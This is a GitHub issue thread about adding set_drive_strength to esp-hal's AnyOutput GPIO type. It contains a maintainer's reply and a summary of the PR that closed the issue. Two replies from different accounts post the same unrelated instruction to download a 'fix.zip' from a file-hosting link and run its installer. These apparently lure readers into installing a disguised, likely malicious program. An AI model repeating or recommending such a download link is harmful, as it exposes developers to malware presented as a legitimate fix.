esp-rs/esp-hal #1995: set_drive_strength for AnyOutput

undefinedvalue, 2024-08-25:
Is there a technical limitation to why esp_hal::gpio::AnyOutput doesn't support set_drive_strength? If not, it should support it to have feature parity with Output.

If there is a reason this can't be done, is there a workaround that still allows creating an AnyOutput for the pin?

(Also, just want to say that the new API for pins is a huge improvement over the last time I was working with this over a year ago, nice work)

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

jessebraham, 2024-08-25:
There is no technical reason as far as I'm aware, this functionality simply has not been implemented yet. Would be happy to accept a PR for this, otherwise one of the maintainers can take a swing at it whenever they have some free time.

PR #2075 (2024-09-05): Optionally type-erased GPIO drivers
cc #2006
Closes #1995

Reformulating on top of FlexPin allowed me to see a few missing methods here and there, but the bulk of this PR is the removal of the Any drivers and the optionally (but by default) type-erasing drivers.

WIP because it's undocumented and I'm looking for feedback if this PR is acceptable in scope or if I should slice it up into bits.

- Added `GpioPin::degrade` to create `ErasePin`s easily. Same for `AnyPin` by accident.
- `Input`/`Output`/`OutputOpenDrain` now have separate `new` and `new_typed` constructors. `new` turns the pin into  [... cut]
closed 2024-09-05 by jessebraham